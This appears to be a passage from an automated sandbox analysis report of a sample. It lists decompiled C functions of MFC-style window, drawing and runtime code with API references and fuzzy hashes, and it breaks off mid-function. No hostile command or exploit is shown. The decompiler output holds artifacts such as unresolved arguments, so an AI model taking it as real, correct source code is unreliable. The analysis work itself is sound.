                                            • GetSystemMetrics.USER32 ref: 00424FEF
                                            • GetSystemMetrics.USER32 ref: 00424FFD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: MetricsSystem$LongParentWindowZoomed
                                            • String ID:
                                            • API String ID: 3909876373-0
                                            • Opcode ID: e1db2512c1cdb55af8a63a090f6a65cb5054dc0af1d91fee160cccb0b30ffb68
                                            • Instruction ID: 3022547c35077017ae25d59748aa6c1922cda0f4cb055a75ef651f6ebc74021f
                                            • Opcode Fuzzy Hash: e1db2512c1cdb55af8a63a090f6a65cb5054dc0af1d91fee160cccb0b30ffb68
                                            • Instruction Fuzzy Hash: 1E0167327006146BDB106FB4DC49B8EB768EF44744F414169FA01AB195D774AC45CBD4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 74%
                                            			E0040E3C9(void* __ecx) {
                                            				long _t1;
                                            				long _t3;
                                            				long _t8;
                                            				void* _t9;
                                            
                                            				_t1 =  *0x43a478; // 0x2
                                            				_t9 = __ecx;
                                            				_t8 = 2;
                                            				if(_t1 != _t8) {
                                            					__eflags = _t1;
                                            					if(_t1 != 0) {
                                            						while(1) {
                                            							L7:
                                            							__eflags =  *0x43a478 - 1;
                                            							if( *0x43a478 != 1) {
                                            								break;
                                            							}
                                            							Sleep(1);
                                            						}
                                            						__eflags =  *0x43a478 - _t8; // 0x2
                                            						if(__eflags != 0) {
                                            							L12:
                                            							return _t9;
                                            						}
                                            						L10:
                                            						_push(0x43a460);
                                            						L11:
                                            						EnterCriticalSection();
                                            						goto L12;
                                            					}
                                            					_t3 = InterlockedExchange(0x43a478, 1);
                                            					__eflags = _t3;
                                            					if(__eflags != 0) {
                                            						__eflags = _t3 - _t8;
                                            						if(_t3 == _t8) {
                                            							 *0x43a478 = _t8;
                                            						}
                                            						goto L7;
                                            					}
                                            					InitializeCriticalSection(0x43a460);
                                            					E00405626(__eflags, E0040E447);
                                            					 *0x43a478 = _t8;
                                            					goto L10;
                                            				}
                                            				_push(0x43a460);
                                            				goto L11;
                                            			}








                                            APIs
                                            • InterlockedExchange.KERNEL32(0043A478,00000001), ref: 0040E3F1
                                            • InitializeCriticalSection.KERNEL32(0043A460,?,00000000,?,0040C53D,?,?,?,?,0040101C,?,00401008), ref: 0040E3FC
                                            • EnterCriticalSection.KERNEL32(0043A460,?,00000000,?,0040C53D,?,?,?,?,0040101C,?,00401008), ref: 0040E43B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterExchangeInitializeInterlocked
                                            • String ID:
                                            • API String ID: 3643093385-0
                                            • Opcode ID: 15d63c4fe175e07819c280863269abae371696f7f342b3235db02761f23b8789
                                            • Instruction ID: 459bb49f379d993a17294b602fe23a8fc8c079e5ea63f72b552277febdb2dab9
                                            • Opcode Fuzzy Hash: 15d63c4fe175e07819c280863269abae371696f7f342b3235db02761f23b8789
                                            • Instruction Fuzzy Hash: AAF0F4303C03509AEA204772AC8D6263754E7A4365F605837F6C1E22D0C7FA4CB2476E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0042146D(void* __ecx, void* _a4) {
                                            				int _v8;
                                            				char _v268;
                                            				void* __ebp;
                                            				void* _t15;
                                            				int _t19;
                                            				intOrPtr* _t23;
                                            				void* _t25;
                                            
                                            				E00413740(_t25, SetActiveWindow( *(__ecx + 0x1c)));
                                            				_t19 = 0;
                                            				_v8 = DragQueryFileA(_a4, 0xffffffff, 0, 0);
                                            				_t15 = E00424BFB();
                                            				_t23 =  *((intOrPtr*)(_t15 + 4));
                                            				if(_v8 > 0) {
                                            					do {
                                            						DragQueryFileA(_a4, _t19,  &_v268, 0x104);
                                            						_t15 =  *((intOrPtr*)( *_t23 + 0x7c))( &_v268);
                                            						_t19 = _t19 + 1;
                                            					} while (_t19 < _v8);
                                            				}
                                            				DragFinish(_a4);
                                            				return _t15;
                                            			}











                                            APIs
                                            • SetActiveWindow.USER32(?), ref: 0042147C
                                            • DragQueryFileA.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 00421497
                                            • DragQueryFileA.SHELL32(?,00000000,?,00000104), ref: 004214B9
                                            • DragFinish.SHELL32(?), ref: 004214D2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Drag$FileQuery$ActiveFinishWindow
                                            • String ID:
                                            • API String ID: 892977027-0
                                            • Opcode ID: 752db8e80aa1e4f32f20f1a7616dd3027f181ba7cb5e1fdd8a659f832917dc3b
                                            • Instruction ID: d3b2b95128177b05ecd3e0cb6b2ffa69d247fd4355a1387cba143c8becacc0b5
                                            • Opcode Fuzzy Hash: 752db8e80aa1e4f32f20f1a7616dd3027f181ba7cb5e1fdd8a659f832917dc3b
                                            • Instruction Fuzzy Hash: C001AD71A00118BFCB10AFA4EC84CDE7BBDEF04368B50416AB554960A0CB74AE828BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004159DA(struct HDC__* _a4, struct HWND__* _a8, intOrPtr _a12, void* _a16, long _a20) {
                                            				long _v12;
                                            				void _v16;
                                            				intOrPtr _t12;
                                            				long _t16;
                                            				void* _t18;
                                            
                                            				if(_a4 == 0 || _a16 == 0) {
                                            					L10:
                                            					return 0;
                                            				} else {
                                            					_t12 = _a12;
                                            					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E0041A759(_a8, _t12) == 0) {
                                            						goto L10;
                                            					} else {
                                            						GetObjectA(_a16, 0xc,  &_v16);
                                            						SetBkColor(_a4, _v12);
                                            						_t16 = _a20;
                                            						if(_t16 == 0xffffffff) {
                                            							_t16 = GetSysColor(8);
                                            						}
                                            						SetTextColor(_a4, _t16);
                                            						_t18 = 1;
                                            						return _t18;
                                            					}
                                            				}
                                            			}









                                            APIs
                                            • GetObjectA.GDI32(00000000,0000000C,?), ref: 00415A18
                                            • SetBkColor.GDI32(00000000,00000000), ref: 00415A24
                                            • GetSysColor.USER32(00000008), ref: 00415A34
                                            • SetTextColor.GDI32(00000000,?), ref: 00415A3E
                                              • Part of subcall function 0041A759: GetWindowLongA.USER32 ref: 0041A76A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Color$LongObjectTextWindow
                                            • String ID:
                                            • API String ID: 2871169696-0
                                            • Opcode ID: 4ad30bffaeaffe627c47a10de67731051e8ff583e855d0137c1ba5dc160fcdf3
                                            • Instruction ID: 5794cb577ca1faeaf387d8a9650f772c60ab8f78b3a0630a70f1c9da6bb06112
                                            • Opcode Fuzzy Hash: 4ad30bffaeaffe627c47a10de67731051e8ff583e855d0137c1ba5dc160fcdf3
                                            • Instruction Fuzzy Hash: A1012830140609EFDF219FA4DD89BEB3B69EF80380F584622F912D41E0C774C9E5DA99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 84%
                                            			E00423A6F(void* __ecx) {
                                            				void* __esi;
                                            				void* _t16;
                                            				void* _t28;
                                            				void* _t30;
                                            				intOrPtr _t32;
                                            				intOrPtr _t34;
                                            
                                            				E00406520(E0042A9EC, _t30);
                                            				_push(__ecx);
                                            				_push(__ecx);
                                            				_t34 =  *0x439c44; // 0x1
                                            				 *((intOrPtr*)(_t30 - 0x10)) = _t32;
                                            				_t28 = __ecx;
                                            				if(_t34 == 0) {
                                            					 *((intOrPtr*)(_t30 - 4)) = 0;
                                            					if( *(_t30 + 0xc) != 0) {
                                            						lstrcpyA(E00416D38(_t28 + 0xc8, lstrlenA( *(_t30 + 0xc))),  *(_t30 + 0xc));
                                            					} else {
                                            						E00416A77(__ecx + 0xc8, __ecx);
                                            					}
                                            					SendMessageA( *(_t28 + 0x1c), 0x85, 0, 0);
                                            					_t16 = 1;
                                            				} else {
                                            					_t16 = E004136A7(__ecx);
                                            				}
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
                                            				return _t16;
                                            			}










                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00423A74
                                            • SendMessageA.USER32(?,00000085,00000000,00000000), ref: 00423AD2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: H_prologMessageSend
                                            • String ID:
                                            • API String ID: 2337391251-0
                                            • Opcode ID: 4ca917c012f4fcbbd9e78dea033b59e07bb3dc9b9d14554c59375adacc446899
                                            • Instruction ID: 2aa457cf7095c193361f5c786731192497787529c17009fc52bec87f436ac3b9
                                            • Opcode Fuzzy Hash: 4ca917c012f4fcbbd9e78dea033b59e07bb3dc9b9d14554c59375adacc446899
                                            • Instruction Fuzzy Hash: 52018F72600210FECB219F52EC09AAF7B78FF94316F50853FF05655050CB795A42CB69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004297EF(void* __ecx) {
                                            				struct tagPOINT _v12;
                                            				struct tagPOINT _v20;
                                            				struct HDC__* _t19;
                                            
                                            				_t19 =  *(__ecx + 8);
                                            				if(_t19 != 0 &&  *(__ecx + 4) != 0) {
                                            					GetViewportOrgEx(_t19,  &_v12);
                                            					E004298F1(__ecx,  &_v12);
                                            					_v12.y = _v12.y +  *((intOrPtr*)(__ecx + 0x24));
                                            					_v12.x = _v12.x +  *((intOrPtr*)(__ecx + 0x20));
                                            					SetViewportOrgEx( *(__ecx + 4), _v12, _v12.y, 0);
                                            					GetWindowOrgEx( *(__ecx + 8),  &_v20);
                                            					return SetWindowOrgEx( *(__ecx + 4), _v20, _v20.y, 0);
                                            				}
                                            				return _t19;
                                            			}







                                            APIs
                                            • GetViewportOrgEx.GDI32(?,?), ref: 0042980A
                                              • Part of subcall function 004298F1: GetViewportExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 00429902
                                              • Part of subcall function 004298F1: GetWindowExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 0042990F
                                            • SetViewportOrgEx.GDI32(00000000,?,00000000,00000000), ref: 00429832
                                            • GetWindowOrgEx.GDI32(?,?), ref: 0042983F
                                            • SetWindowOrgEx.GDI32(00000000,?,?,00000000), ref: 00429850
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: ViewportWindow
                                            • String ID:
                                            • API String ID: 1589084482-0
                                            • Opcode ID: 9cb27b9576bff162c776de5092b62e69a93abe33db6f5d663133d7bfa2b1e625
                                            • Instruction ID: c39a85c19b382e653cd8ba5d99ea89e37b71820b7245054109fbca8261a50672
                                            • Opcode Fuzzy Hash: 9cb27b9576bff162c776de5092b62e69a93abe33db6f5d663133d7bfa2b1e625
                                            • Instruction Fuzzy Hash: CE018B31A00219EFDF21AB94DC09EAEBBB9FF08300F44446DF552A2160D730AA10DB48
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 38%
                                            			E00423946(intOrPtr* __eax, void* __ebx, struct tagRECT* _a5, intOrPtr _a9) {
                                            				int _t13;
                                            				int _t14;
                                            				void* _t18;
                                            				signed int _t20;
                                            				struct tagRECT* _t24;
                                            
                                            				asm("pushfd");
                                            				 *__eax =  *__eax + __eax;
                                            				if( *__eax == 0) {
                                            					_t20 = E00416528(_t18);
                                            					if((_t20 & 0x00040600) == 0) {
                                            						_push(GetSystemMetrics(6));
                                            						_push(5);
                                            					} else {
                                            						_push(GetSystemMetrics(0x21));
                                            						_push(0x20);
                                            					}
                                            					_t13 = GetSystemMetrics();
                                            					_t24 = _a5;
                                            					_t14 = InflateRect(_t24, _t13, ??);
                                            					if((_t20 & 0x00c00000) != 0) {
                                            						_t14 =  *0x439c9c; // 0x0
                                            						_t24->top = _t24->top - _t14;
                                            					}
                                            				} else {
                                            					_t14 = E00415361(_t18, _a5, _a9);
                                            				}
                                            				return _t14;
                                            			}









                                            APIs
                                            • GetSystemMetrics.USER32 ref: 00423975
                                            • GetSystemMetrics.USER32 ref: 00423989
                                            • InflateRect.USER32(?,00000000), ref: 00423991
                                              • Part of subcall function 00415361: AdjustWindowRectEx.USER32(?,00000000,00000000,00000000), ref: 00415382
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: MetricsRectSystem$AdjustInflateWindow
                                            • String ID:
                                            • API String ID: 4080371637-0
                                            • Opcode ID: 478b58855d32e14134a02de9518b8f521cec39634a60b9e5a7c6a0ca6cd3883b
                                            • Instruction ID: 476433383503efba52e9924e6e49c42754f463986d7ec7af0d6b2631c1f39b91
                                            • Opcode Fuzzy Hash: 478b58855d32e14134a02de9518b8f521cec39634a60b9e5a7c6a0ca6cd3883b
                                            • Instruction Fuzzy Hash: 6FF0F672644320BFD2115B94BC04B6B7F74DF82721F46401BB94857250C6AC9D91CB9B
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 37%
                                            			E00422D9C(struct tagRECT* _a8) {
                                            				signed int _t11;
                                            				int _t13;
                                            				intOrPtr _t14;
                                            				void* _t18;
                                            				signed int _t20;
                                            				struct tagRECT* _t23;
                                            
                                            				if( *0x439c44 != 0) {
                                            					return E004136A7(_t18);
                                            				}
                                            				_t20 = E00416528(_t18);
                                            				if((_t20 & 0x00040600) == 0) {
                                            					_push( ~(GetSystemMetrics(6)));
                                            					_push(5);
                                            				} else {
                                            					_push( ~(GetSystemMetrics(0x21)));
                                            					_push(0x20);
                                            				}
                                            				_t11 = GetSystemMetrics();
                                            				_t23 = _a8;
                                            				_t13 = InflateRect(_t23,  ~_t11, ??);
                                            				if((_t20 & 0x00c00000) != 0) {
                                            					_t14 =  *0x439c9c; // 0x0
                                            					_t23->top = _t23->top + _t14;
                                            					return _t14;
                                            				}
                                            				return _t13;
                                            			}










                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: MetricsSystem$InflateRect
                                            • String ID:
                                            • API String ID: 437325472-0
                                            • Opcode ID: 6060918641cc2463bec1deac6ee1b13bf6bfdcc09788a2bc1d355cc03caae5fb
                                            • Instruction ID: 4fb92264d37d23bc1c26475d3dc17a881ebb7d940131a89487b38c95dcd350b0
                                            • Opcode Fuzzy Hash: 6060918641cc2463bec1deac6ee1b13bf6bfdcc09788a2bc1d355cc03caae5fb
                                            • Instruction Fuzzy Hash: DBF02E32740334BFE221ABA4BD00B7B3355DF40B14F56002BF909A7284CBE86C418BAE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0041A843(struct HWND__* _a4, CHAR* _a8) {
                                            				char _v260;
                                            				int _t14;
                                            				int _t15;
                                            
                                            				_t15 = lstrlenA(_a8);
                                            				if(_t15 > 0x100 || GetWindowTextA(_a4,  &_v260, 0x100) != _t15) {
                                            					L3:
                                            					return SetWindowTextA(_a4, _a8);
                                            				}
                                            				_t14 = lstrcmpA( &_v260, _a8);
                                            				if(_t14 != 0) {
                                            					goto L3;
                                            				}
                                            				return _t14;
                                            			}







                                            APIs
                                            • lstrlenA.KERNEL32(?,00000800), ref: 0041A850
                                            • GetWindowTextA.USER32 ref: 0041A86C
                                            • lstrcmpA.KERNEL32(?,?), ref: 0041A880
                                            • SetWindowTextA.USER32(00000104,?), ref: 0041A890
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: TextWindow$lstrcmplstrlen
                                            • String ID:
                                            • API String ID: 330964273-0
                                            • Opcode ID: 1cfb4ac0c6899b474dfd1d84c176643e54bd71b72646a20d8addbcc5a2558e60
                                            • Instruction ID: c3fc7a8564519c1884d43f76098dd6529aba3a828980642d919d20382e6303d7
                                            • Opcode Fuzzy Hash: 1cfb4ac0c6899b474dfd1d84c176643e54bd71b72646a20d8addbcc5a2558e60
                                            • Instruction Fuzzy Hash: FFF05831600018ABCF32AF24DC08ADEBB6CFB18391F048172FC5AD1160D775CAA6CB99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00420031(void* __ecx, void* __eflags) {
                                            				signed int _t9;
                                            				int _t10;
                                            				void* _t12;
                                            				void* _t13;
                                            				signed int* _t14;
                                            				void* _t15;
                                            
                                            				_t13 = __ecx;
                                            				E0042007A(__ecx, __eflags, 1);
                                            				ReleaseCapture();
                                            				_t12 = E00413740(_t15, GetDesktopWindow());
                                            				LockWindowUpdate(0);
                                            				_t9 =  *(_t13 + 0x84);
                                            				_t14 = _t13 + 0x84;
                                            				if(_t9 != 0) {
                                            					_t10 = ReleaseDC( *(_t12 + 0x1c),  *(_t9 + 4));
                                            					 *_t14 =  *_t14 & 0x00000000;
                                            					return _t10;
                                            				}
                                            				return _t9;
                                            			}










                                            APIs
                                              • Part of subcall function 0042007A: GetStockObject.GDI32(00000000), ref: 00420090
                                              • Part of subcall function 0042007A: InflateRect.USER32(?,000000FF,000000FF), ref: 00420134
                                            • ReleaseCapture.USER32(00000001,745EA0A0,?,00420430,00000000), ref: 0042003C
                                            • GetDesktopWindow.USER32 ref: 00420042
                                            • LockWindowUpdate.USER32(00000000,00000000,?,00420430,00000000), ref: 00420052
                                            • ReleaseDC.USER32 ref: 0042006E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
                                            • String ID:
                                            • API String ID: 1260764132-0
                                            • Opcode ID: 423f5da81c9821fbb59232a2df5f391de1bc3aff17169a30eddc45f67e9bdea0
                                            • Instruction ID: aa72cfc852c6b525c97a93d2fef73d5ebb0a3ecfc5ad3a3ec9de28fd496f1bdc
                                            • Opcode Fuzzy Hash: 423f5da81c9821fbb59232a2df5f391de1bc3aff17169a30eddc45f67e9bdea0
                                            • Instruction Fuzzy Hash: D0E0D8313003119BE7206B71FC0DB557BA4FF40791F494035F944C61B1CB78A842CB98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 92%
                                            			E00406D64(void* __ebx, void* __edi) {
                                            				char _v17;
                                            				signed char _v18;
                                            				struct _cpinfo _v24;
                                            				char _v280;
                                            				char _v536;
                                            				char _v792;
                                            				char _v1304;
                                            				void* _t43;
                                            				char _t44;
                                            				signed char _t45;
                                            				void* _t55;
                                            				signed int _t56;
                                            				signed char _t64;
                                            				intOrPtr* _t66;
                                            				signed int _t68;
                                            				signed int _t70;
                                            				signed int _t71;
                                            				signed char _t76;
                                            				signed char _t77;
                                            				signed char* _t78;
                                            				void* _t81;
                                            				void* _t87;
                                            				void* _t88;
                                            
                                            				if(GetCPInfo( *0x43b640,  &_v24) == 1) {
                                            					_t44 = 0;
                                            					do {
                                            						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
                                            						_t44 = _t44 + 1;
                                            					} while (_t44 < 0x100);
                                            					_t45 = _v18;
                                            					_v280 = 0x20;
                                            					if(_t45 == 0) {
                                            						L9:
                                            						E0040A040(1,  &_v280, 0x100,  &_v1304,  *0x43b640,  *0x43b864, 0);
                                            						E00409DEA( *0x43b864, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x43b640, 0);
                                            						E00409DEA( *0x43b864, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x43b640, 0);
                                            						_t55 = 0;
                                            						_t66 =  &_v1304;
                                            						do {
                                            							_t76 =  *_t66;
                                            							if((_t76 & 0x00000001) == 0) {
                                            								if((_t76 & 0x00000002) == 0) {
                                            									 *(_t55 + 0x43b660) =  *(_t55 + 0x43b660) & 0x00000000;
                                            									goto L16;
                                            								}
                                            								 *(_t55 + 0x43b761) =  *(_t55 + 0x43b761) | 0x00000020;
                                            								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
                                            								L12:
                                            								 *(_t55 + 0x43b660) = _t77;
                                            								goto L16;
                                            							}
                                            							 *(_t55 + 0x43b761) =  *(_t55 + 0x43b761) | 0x00000010;
                                            							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
                                            							goto L12;
                                            							L16:
                                            							_t55 = _t55 + 1;
                                            							_t66 = _t66 + 2;
                                            						} while (_t55 < 0x100);
                                            						return _t55;
                                            					}
                                            					_t78 =  &_v17;
                                            					do {
                                            						_t68 =  *_t78 & 0x000000ff;
                                            						_t56 = _t45 & 0x000000ff;
                                            						if(_t56 <= _t68) {
                                            							_t81 = _t87 + _t56 - 0x114;
                                            							_t70 = _t68 - _t56 + 1;
                                            							_t71 = _t70 >> 2;
                                            							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
                                            							_t88 = _t88 + 0x18;
                                            						}
                                            						_t78 =  &(_t78[2]);
                                            						_t45 =  *((intOrPtr*)(_t78 - 1));
                                            					} while (_t45 != 0);
                                            					goto L9;
                                            				}
                                            				_t43 = 0;
                                            				do {
                                            					if(_t43 < 0x41 || _t43 > 0x5a) {
                                            						if(_t43 < 0x61 || _t43 > 0x7a) {
                                            							 *(_t43 + 0x43b660) =  *(_t43 + 0x43b660) & 0x00000000;
                                            						} else {
                                            							 *(_t43 + 0x43b761) =  *(_t43 + 0x43b761) | 0x00000020;
                                            							_t64 = _t43 - 0x20;
                                            							goto L22;
                                            						}
                                            					} else {
                                            						 *(_t43 + 0x43b761) =  *(_t43 + 0x43b761) | 0x00000010;
                                            						_t64 = _t43 + 0x20;
                                            						L22:
                                            						 *(_t43 + 0x43b660) = _t64;
                                            					}
                                            					_t43 = _t43 + 1;
                                            				} while (_t43 < 0x100);
                                            				return _t43;
                                            			}



























                                            APIs
                                            • GetCPInfo.KERNEL32(?,00000000), ref: 00406D78
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Info
                                            • String ID: $
                                            • API String ID: 1807457897-3032137957
                                            • Opcode ID: 1ede330d16080c1c95d27d4bf0c3672f6aaaf0e2f94890a87c5ee2107f815b63
                                            • Instruction ID: 0991ebd0fa5129877e21a5118ab4003fa57d8a1e05bbe212390e33009e0f709d
                                            • Opcode Fuzzy Hash: 1ede330d16080c1c95d27d4bf0c3672f6aaaf0e2f94890a87c5ee2107f815b63
                                            • Instruction Fuzzy Hash: 6B4137311042AC5AEB119B14CD4ABEB3B99DB12704F1914F6D28AE61E3C3394964C7EA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 80%
                                            			E00414354(void* __ecx, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                            				struct _WNDCLASSA _v44;
                                            				void* __ebp;
                                            				void* _t27;
                                            				void* _t36;
                                            				intOrPtr _t40;
                                            				struct HINSTANCE__* _t46;
                                            				CHAR* _t50;
                                            
                                            				E00425FC6(1);
                                            				E004067EC(0, 0);
                                            				_push(0);
                                            				_t50 = E004249C4() + 0x58;
                                            				_t27 = E00424BFB();
                                            				_t40 = _a8;
                                            				_t46 =  *(_t27 + 8);
                                            				if(_t40 != 0 || _a12 != _t40 || _a16 != _t40) {
                                            					wsprintfA(_t50, "Afx:%x:%x:%x:%x:%x", _t46, _a4, _t40, _a12, _a16);
                                            				} else {
                                            					wsprintfA(_t50, "Afx:%x:%x", _t46, _a4);
                                            				}
